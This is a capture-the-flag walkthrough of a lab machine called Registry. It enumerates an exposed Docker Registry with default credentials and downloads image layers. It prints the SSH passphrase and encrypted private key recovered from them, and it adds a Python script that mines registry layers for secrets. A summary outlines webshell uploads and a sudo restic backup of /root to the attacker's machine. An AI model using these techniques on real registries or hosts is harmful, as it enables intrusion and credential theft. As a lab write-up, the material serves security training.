
Quick Summary
   → My very first Hard box is now retired. It is a machine you can exploit once you recognise the technology in use. The initial scan gave a big hint that the machine runs Docker together with a third-party service, a Docker Registry server.
   The registry holds an image whose layers I downloaded; inside them I found an SSH key and its passphrase, which got me onto the machine and to user.txt.
   For privilege escalation I first had to move laterally to the www-data shell, i.e. the web server account. From there, that user can abuse its sudoers rights to run restic and back up the root directory to a restic server on my Kali Linux machine, which yields root's SSH key, a root shell and root.txt.
Penetration Testing Methodologies
- Network Scanning
  → Nmap scan
  → discover open ports and what services are running
- Enumeration
  → browse the HTTP service
  → put the commonName from the Nmap scan (docker.registry.htb) in /etc/hosts
  → download and analyze the install file
  → visit docker.registry.htb and look for interesting data in the Docker Registry API
- Post-Exploitation
  → enumerate the Docker Registry API
  → found a repository that contains an image called bolt-image
  → found the blob (layer) digests in the latest manifest
  → download all the blobs and look for a password or SSH key
  → get into the Registry machine
- Exploitation
  → enumerate the Bolt CMS website
  → with LinPEAS I found a password hash that I can crack to get the website password
  → modify config.yml and upload 2 webshells as fast as I can to gain a www-data shell
- Privilege Escalation
  → abuse what www-data is allowed to run via sudo, which is restic
  → create a restic repository on my Kali Linux machine, which will be the backup server
  → set up a reverse SSH tunnel from the bolt user shell
  → run restic as www-data and back up the root directory, which transfers it to my machine
  → get the id_rsa key from the .ssh folder and log in as root
  → finally rooted and got root.txt
Network Scanning
Walkthrough
→ First, I run Nmap to scan the target and get information about the services running on the target machine. I use:
- -sV      ⇒ probe open ports to determine service/version info
- -sC      ⇒ equivalent to --script=default
- -T<0-5>  ⇒ set timing template; higher is faster (less accurate)
- -p-      ⇒ scan all 65535 ports
- -oN      ⇒ save the scan results to a text file (normal output)
| # bash
 nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry
 
 
 | 
| # bash
 root in htb/boxes/Registry
 ❯ nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry
 Starting Nmap 7.80 ( https:
 Warning: 10.10.10.159 giving up on port because retransmission cap hit (6).
 Nmap scan report for 10.10.10.159
 Host is up (0.25s latency).
 Not shown: 65458 closed ports, 74 filtered ports
 PORT    STATE SERVICE  VERSION
 22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
 |   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
 |_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
 80/tcp  open  http     nginx 1.14.0 (Ubuntu)
 |_http-server-header: nginx/1.14.0 (Ubuntu)
 |_http-title: Welcome to nginx!
 443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
 |_http-server-header: nginx/1.14.0 (Ubuntu)
 |_http-title: Welcome to nginx!
 | ssl-cert: Subject: commonName=docker.registry.htb
 | Not valid before: 2019-05-06T21:14:35
 |_Not valid after:  2029-05-03T21:14:35
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https:
 Nmap done: 1 IP address (1 host up) scanned in 1218.67 seconds
 
 root in htb/boxes/Registry took 20m19s
 ❯
 
 
 | 
Nmap results
So there are three open ports:
- 22      ⇒ SSH
- 80      ⇒ HTTP (nginx)
- 443     ⇒ HTTPS (nginx) with an SSL certificate whose commonName is docker.registry.htb; I added that name to my hosts file.
Enumeration
I always visit the HTTP service first because it is a website, and here I got the default page of an nginx server.

There is no hint on it, so I enumerated the website with dirsearch (a web path scanner) to look for pages or items that could give me a hint.
Bruteforce Web directories
| 
 root in htb/boxes/Registry
 ❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.159/" -e asd -t 20 --simple-report=registry-directories
 
 _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
 
 Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109
 
 Error Log: /opt/dirsearch/logs/errors-20-04-04_07-13-49.log
 
 Target: http://10.10.10.159/
 
 [07:13:49] Starting:
 [07:13:51] 400 -  182B  - /%2e%2e/google.com
 [07:13:51] 403 -  580B  - /.bash_history
 [07:13:53] 403 -  580B  - /.ht_wsr.txt
 [07:13:53] 403 -  580B  - /.hta
 [07:13:53] 403 -  580B  - /.htaccess-dev
 [07:13:53] 403 -  580B  - /.htaccess-local
 [07:13:53] 403 -  580B  - /.htaccess-marco
 [07:13:53] 403 -  580B  - /.htaccess.BAK
 [07:13:53] 403 -  580B  - /.htaccess.bak1
 [07:13:53] 403 -  580B  - /.htaccess.old
 [07:13:53] 403 -  580B  - /.htaccess.orig
 [07:13:53] 403 -  580B  - /.htaccess.sample
 [07:13:53] 403 -  580B  - /.htaccess.txt
 [07:13:53] 403 -  580B  - /.htaccess.save
 [07:13:53] 403 -  580B  - /.htaccess_extra
 [07:13:53] 403 -  580B  - /.htaccess_orig
 [07:13:53] 403 -  580B  - /.htaccess_sc
 [07:13:53] 403 -  580B  - /.htaccessBAK
 [07:13:53] 403 -  580B  - /.htaccessOLD
 [07:13:53] 403 -  580B  - /.htaccessOLD2
 [07:13:53] 403 -  580B  - /.htaccess~
 [07:13:53] 403 -  580B  - /.htgroup
 [07:13:53] 403 -  580B  - /.htpasswd-old
 [07:13:53] 403 -  580B  - /.htpasswd_test
 [07:13:53] 403 -  580B  - /.htpasswds
 [07:13:53] 403 -  580B  - /.htusers
 [07:14:05] 403 -  580B  - /admin/.htaccess
 [07:14:13] 403 -  580B  - /administrator/.htaccess
 [07:14:17] 403 -  580B  - /app/.htaccess
 [07:14:44] 200 -  612B  - /index.html
 [07:14:45] 301 -  194B  - /install  ->  http://10.10.10.159/install/
 [07:14:45] 200 -    1KB - /install/
 
 Task Completed
 
 root in htb/boxes/Registry took 2m4s
 ❯
 
 
 | 
Get install file
I only got one hit, /install; when I opened it in the browser it showed a 404 Page Not Found.

But I managed to download install using wget:
| # bash
 root in htb/boxes/Registry
 ❯ wget http:
 --2020-04-04 07:27:30--  http:
 Connecting to 10.10.10.159:80... connected.
 HTTP request sent, awaiting response... 301 Moved Permanently
 Location: http:
 --2020-04-04 07:27:30--  http:
 Reusing existing connection to 10.10.10.159:80.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [text/html]
 Saving to: ‘install’
 
 install                                            [ <=>                                                                                                ]   1.03K  --.-KB/s    in 0s
 
 2020-04-04 07:27:31 (81.5 MB/s) - ‘install’ saved [1050]
 
 
 root in htb/boxes/Registry
 ❯
 
 
 | 
I thought this was just an ordinary text file, but it is not: file identifies it as gzip data. I renamed it to install.gz and tried to decompress it, but that did not work and I could not tell why, so I moved on to the next phase.
| 
 root in htb/boxes/Registry
 ❯ file install
 install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200
 
 
 | 

Explore Docker Registry
Next I visited docker.registry.htb. It pops up an HTTP Basic authentication prompt for username and password; I entered admin:admin and it displayed the registry's JSON API.

and the JSON API:

Post - Exploitation
Next, I searched for Docker Registry API exploitation and found an article that helped me get the passphrase for an SSH key by exploring each blob (image layer).
So, following the article's method, I first looked at /v2/_catalog. There is one repository, "bolt-image"; a repository is a collection of related images (tags).
Diving the Docker Repository

Next I requested /v2/bolt-image/tags/list and there is a single tag, latest.

Then I tried the manifest endpoint, /v2/bolt-image/manifests/<reference>:

To download the manifest for the latest tag I simply saved /v2/bolt-image/manifests/latest to a file called latest.

Open this file and you see a list of blobSum entries: these are the digests of the layers that make up the latest tag of bolt-image. Each layer is a gzipped tar of the filesystem changes made at that build step, so it can contain passwords, configuration files, SSH keys and so on.
Here are some blobs from latest.
| 
 root in htb/boxes/Registry
 ❯ cat latest
 
 {
 "schemaVersion": 1,
 "name": "bolt-image",
 "tag": "latest",
 "architecture": "amd64",
 "fsLayers": [
 {
 "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
 },
 {
 "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
 },
 {
 "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
 },
 {
 "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
 },
 {
 "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
 },
 {
 "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
 },
 {
 "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
 },
 {
 "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
 },
 {
 "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
 },
 {
 "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
 }
 ],
 "history": [
 {
 "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
 },
 {
 "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop)  CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}"
 },
 {
 "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
 }
 ],
 "signatures": [
 {
 "header": {
 "jwk": {
 "crv": "P-256",
 "kid": "VUEK:AQ5E:PKKZ:YK3J:YU44:72EU:GB57:BMI2:QMIK:DZEH:73WL:Q7BY",
 "kty": "EC",
 "x": "yS0jBSmoO13WXoTRXRcp_OsqPZ3-ttTv3biBxexcyCo",
 "y": "JpwUWLV6IwW720h8XgeRpCvPoeZ_f8I82qIprZvEgm4"
 },
 "alg": "ES256"
 },
 "signature": "9E2loVJqpUIUj3EnEIrSKzOWaHvHKEsdAgcPX8sr152QKzWw3J7SgwLOnXPaJWegHyjYjTDnsNyEauNF8_J2SA",
 "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wNFQwMDoyNzo1MVoifQ"
 }
 ]
 }
 
 
 | 
Exploring the blobSums
So I need to explore each blobSum; I download each one with wget and look for interesting content:
| # bash
 root in htb/boxes/Registry
 ❯ wget --no-check-certificate --http-user=admin --http-password=admin https:
 --2020-04-04 08:38:15--  https:
 Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159
 Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected.
 WARNING: The certificate of ‘docker.registry.htb’ is not trusted.
 WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer.
 HTTP request sent, awaiting response... 401 Unauthorized
 Authentication selected: Basic realm="Registry"
 Reusing existing connection to docker.registry.htb:443.
 HTTP request sent, awaiting response... 200 OK
 Length: 335 [application/octet-stream]
 Saving to: ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’
 
 sha256:302bfcb3f10c386a25a58913917257bd2fe7721 100%[===================================================================================================>]     335  --.-KB/s    in 0s
 
 2020-04-04 08:38:16 (250 MB/s) - ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’ saved [335/335]
 
 
 root in htb/boxes/Registry
 ❯ ls
 install  install.gz  latest  nmap-Registry  registry-directories  sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
 
 
 | 
Then I rename it to a .gz file and decompress it.
| 
 
 root in htb/boxes/Registry
 ❯ mv sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz
 
 
 root in htb/boxes/Registry
 ❯ gunzip sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz
 
 
 | 
Finally I can read what is in the first blob (the decompressed blob is a raw tar archive, which is why tar headers are interleaved with the file content):
| 
 root in htb/boxes/Registry
 ❯ cat sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
 etc/0040755000000000000000000000000013472256035010032 5ustar0000000000000000etc/profile.d/0040755000000000000000000000000013472256264011720 5ustar0000000000000000etc/profile.d/01-ssh.sh0100755000000000000000000000033613472067523013267 0ustar0000000000000000#!/usr/bin/expect -f
 
 spawn ssh-add /root/.ssh/id_rsa
 expect "Enter passphrase for /root/.ssh/id_rsa:"
 send "GkOcz221Ftb3ugog\n";
 expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
 interact
 etc/profile.d/.wh.02-ssh.sh0000600000000000000000000000000013472256232013730 0ustar0000000000000000
 root in htb/boxes/Registry
 ❯
 
 
 | 
Based on the first blob I downloaded, "GkOcz221Ftb3ugog" looks like the passphrase for an SSH key, but I do not have the id_rsa that this line needs:
| 
 expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
 
 
 | 
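The catalog → tags → manifest → blobs walk above, plus the gunzip and tar steps, can be scripted. The following is an added example written for this page, not the article's own code or the registry's: it takes a saved schema-1 manifest (like the latest file above) and the blob files wget already fetched, orders the layers the way the runtime applies them, unpacks each gzipped tar in memory and reports the paths worth reading. It also honours whiteout entries (files named .wh.<name>, like the etc/profile.d/.wh.02-ssh.sh seen in the first blob): a whiteout means a later build step deleted that file, so it is invisible in a running container but still sits in the lower layer, which is exactly where leaked keys tend to survive. The EMPTY_LAYER digest is the well-known shared empty layer that also appears in the manifest above; the INTERESTING pattern list, the placeholder digests and the two constructed layers in demo() are assumptions made for the offline run.

```python
# Added example, not the article's own code: walk a Docker Registry v2 schema-1
# manifest (like the `latest` file above) and mine the layer blobs for secrets.
# Fetching is left to wget as in the article; this takes the saved files.
import gzip
import io
import re
import tarfile
from typing import Dict, Iterable, List, Tuple

# Well-known digest of the shared empty layer (gzip'd empty tar) that registries
# serve for no-op history entries; downloading it is a wasted request.
EMPTY_LAYER = "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"

# Paths worth reading by hand (assumption: a starter list, extend it).
INTERESTING = re.compile(
    r"(^|/)(\.ssh/|id_rsa$|id_ed25519$|authorized_keys$|\.bash_history$|\.env$|"
    r"config\.(yml|yaml|json|php)$|profile\.d/|\.netrc$|\.docker/config\.json$)")

def blob_url(registry: str, repo: str, digest: str) -> str:
    """Registry HTTP API v2 blob endpoint, the URL the wget calls above hit."""
    return f"https://{registry}/v2/{repo}/blobs/{digest}"

def layers_from_manifest(manifest: dict) -> List[str]:
    """Unique layer digests in apply order (base first). Schema-1 manifests list
    fsLayers top-most first; digests may repeat; the empty layer is skipped."""
    seen, ordered = set(), []
    for layer in reversed(manifest["fsLayers"]):
        digest = layer["blobSum"]
        if digest != EMPTY_LAYER and digest not in seen:
            seen.add(digest)
            ordered.append(digest)
    return ordered

def layer_files(blob: bytes) -> Dict[str, bytes]:
    """Unpack one layer blob (gzip'd tar; plain tar also accepted) to {path: bytes}."""
    raw = gzip.decompress(blob) if blob[:2] == b"\x1f\x8b" else blob
    files: Dict[str, bytes] = {}
    with tarfile.open(fileobj=io.BytesIO(raw), mode="r:") as tar:
        for m in tar.getmembers():
            if m.isfile():
                name = m.name[2:] if m.name.startswith("./") else m.name
                files[name.lstrip("/")] = tar.extractfile(m).read()
    return files

def merge_layers(layers: Iterable[Dict[str, bytes]]) -> Tuple[Dict[str, bytes], List[str]]:
    """Apply layers base-first, honouring whiteouts like the container runtime:
    `.wh.<name>` deletes <name> from lower layers, `.wh..wh..opq` empties its dir.
    Deleted paths are returned separately: invisible in a running container, but
    still present in the lower blob, which is where a removed key keeps leaking."""
    merged: Dict[str, bytes] = {}
    hidden: List[str] = []
    for layer in layers:
        for path, content in layer.items():
            directory, _, name = path.rpartition("/")
            prefix = directory + "/" if directory else ""
            if name == ".wh..wh..opq":
                victims = [p for p in merged if p.startswith(prefix)]
            elif name.startswith(".wh."):
                target = prefix + name[len(".wh."):]
                victims = [p for p in merged if p == target or p.startswith(target + "/")]
            else:
                merged[path] = content
                continue
            for p in victims:
                hidden.append(p)
                del merged[p]
    return merged, hidden

def interesting_paths(files: Dict[str, bytes]) -> List[str]:
    return sorted(p for p in files if INTERESTING.search(p))

def build_layer(entries: Dict[str, bytes]) -> bytes:
    """Constructed test data: pack {path: bytes} into a gzip'd tar like a real layer."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in entries.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return gzip.compress(buf.getvalue())

def demo() -> Tuple[List[str], List[str], List[str]]:
    """Offline walk over a constructed two-layer image shaped like bolt-image."""
    manifest = {"schemaVersion": 1, "name": "bolt-image", "tag": "latest", "fsLayers": [
        {"blobSum": "sha256:top"}, {"blobSum": EMPTY_LAYER}, {"blobSum": "sha256:base"}]}
    blobs = {  # placeholder digests, not real hashes
        "sha256:base": build_layer({
            "etc/profile.d/02-ssh.sh": b"#!/bin/sh\nssh-add /root/.ssh/id_rsa\n",
            "root/.ssh/id_rsa": b"-----BEGIN RSA PRIVATE KEY-----\n...\n",
            "usr/bin/true": b""}),
        "sha256:top": build_layer({
            "etc/profile.d/01-ssh.sh": b'#!/usr/bin/expect -f\nsend "passphrase\\n"\n',
            "etc/profile.d/.wh.02-ssh.sh": b""})}  # whiteout: deletes 02-ssh.sh
    order = layers_from_manifest(manifest)
    merged, hidden = merge_layers(layer_files(blobs[d]) for d in order)
    return order, interesting_paths(merged), hidden

if __name__ == "__main__":
    print(demo())
```

Against real blobs, load the saved manifest with json.load, call layers_from_manifest on it, and pass each file wget saved through layer_files in that order; anything listed under "hidden" is worth pulling from the lower blob by hand, because a whiteout only hides it from the running container, it does not remove it from the registry.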
Hunting the Private key
So I need more blobs to get the id_rsa key. The second blob was empty, and the third looks interesting: it is about 100 MB of files, so:
| 
 root in boxes/Registry/docker
 ❯ wget --no-check-certificate --http-user=admin --http-password=admin https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
 --2020-04-04 09:03:19--  https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
 Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159
 Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected.
 WARNING: The certificate of ‘docker.registry.htb’ is not trusted.
 WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer.
 HTTP request sent, awaiting response... 401 Unauthorized
 Authentication selected: Basic realm="Registry"
 Reusing existing connection to docker.registry.htb:443.
 HTTP request sent, awaiting response... 200 OK
 Length: 104569678 (100M) [application/octet-stream]
 Saving to: ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’
 
 sha256:2931a8b44e495489fdbe2bccd7232e99b182034 100%[===================================================================================================>]  99.72M   752KB/s    in 2m 56s
 
 2020-04-04 09:06:16 (580 KB/s) - ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’ saved [104569678/104569678]
 
 
 root in boxes/Registry/docker took 2m57s
 ❯
 
 
 | 
Get in into the REGISTRY
After the download finished I extracted it and explored the /root directory, which contains a .ssh directory with an id_rsa and a config file.

I looked at the config file first; the SSH user is bolt:
| 
 Host registry
 User bolt
 Port 22
 Hostname registry.htb
 
 root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh
 
 
 | 
and the RSA key, which is encrypted, so the passphrase from the first blob is needed to use it:
| 
 root in boxes/Registry/docker
 ❯ cat id_rsa
 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
 
 KF9YHXRjDZ35Q9ybzkhcUNKF8DSZ+aNLYXPL3kgdqlUqwfpqpbVdHbMeDk7qbS7w
 KhUv4Gj22O1t3koy9z0J0LpVM8NLMgVZhTj1eAlJO72dKBNNv5D4qkIDANmZeAGv
 7RwWef8FwE3jTzCDynKJbf93Gpy/hj/SDAe77PD8J/Yi01Ni6MKoxvKczL/gktFL
 /mURh0vdBrIfF4psnYiOcIDCkM2EhcVCGXN6BSUxBud+AXF0QP96/8UN8A5+O115
 p7eljdDr2Ie2LlF7dhHSSEMQG7lUqfEcTmsqSuj9lBwfN22OhFxByxPvkC6kbSyH
 XnUqf+utie21kkQzU1lchtec8Q4BJIMnRfv1kufHJjPFJMuWFRbYAYlL7ODcpIvt
 UgWJgsYyquf/61kkaSmc8OrHc0XOkif9KE63tyWwLefOZgVgrx7WUNRNt8qpjHiT
 nfcjTEcOSauYmGtXoEI8LZ+oPBniwCB4Qx/TMewia/qU6cGfX9ilnlpXaWvbq39D
 F1KTFBvwkM9S1aRJaPYu1szLrGeqOGH66dL24f4z4Gh69AZ5BCYgyt3H2+FzZcRC
 iSnwc7hdyjDI365ZF0on67uKVDfe8s+EgXjJWWYWT7rwxdWOCzhd10TYuSdZv3MB
 TdY/nF7oLJYyO2snmedg2x11vIG3fVgvJa9lDfy5cA9teA3swlOSkeBqjRN+PocS
 5/9RBV8c3HlP41I/+oV5uUTInaxCZ/eVBGVgVe5ACq2Q8HvW3HDvLEz36lTw+kGE
 SxbxZTx1CtLuyPz7oVxaCStn7Cl582MmXlp/MBU0LqodV44xfhnjmDPUK6cbFBQc
 GUeTlxw+gRwby4ebLLGdTtuYiJQDlZ8itRMTGIHLyWJEGVnO4MsX0bAOnkBRllhA
 CqceFXlVE+K3OfGpo3ZYj3P3xBeDG38koE2CaxEKQazHc06aF5zlcxUNBusOxNK4
 ch2x+BpuhB0DWavdonHj+ZU9nuCLUhdy3kjg0FxqgHKZo3k55ai+4hFUIT5fTNHA
 iuMLFSAwONGOf+926QUQd1xoeb/n8h5b0kFYYVD3Vkt4Fb+iBStVG6pCneN2lILq
 rSVi9oOIy+NRrBg09ZpMLXIQXLhHSk3I7vMhcPoWzBxPyMU29ffxouK0HhkARaSP
 3psqRVI5GPsnGuWLfyB2HNgQWNHYQoILdrPOpprxUubnRg7gExGpmPZALHPed8GP
 pLuvFCgn+SCf+DBWjMuzP3XSoN9qBSYeX8OKg5r3V19bhz24i2q/HMULWQ6PLzNb
 v0NkNzCg3AXNEKWaqF6wi7DjnHYgWMzmpzuLj7BOZvLwWJSLvONTBJDFa4fK5nUH
 UnYGl+WT+aYpMfp6vd6iMtet0bh9wif68DsWqaqTkPl58z80gxyhpC2CGyEVZm/h
 P03LMb2YQUOzBBTL7hOLr1VuplapAx9lFp6hETExaM6SsCp/StaJfl0mme8tw0ue
 QtwguqwQiHrmtbp2qsaOUB0LivMSzyJjp3hWHFUSYkcYicMnsaFW+fpt+ZeGGWFX
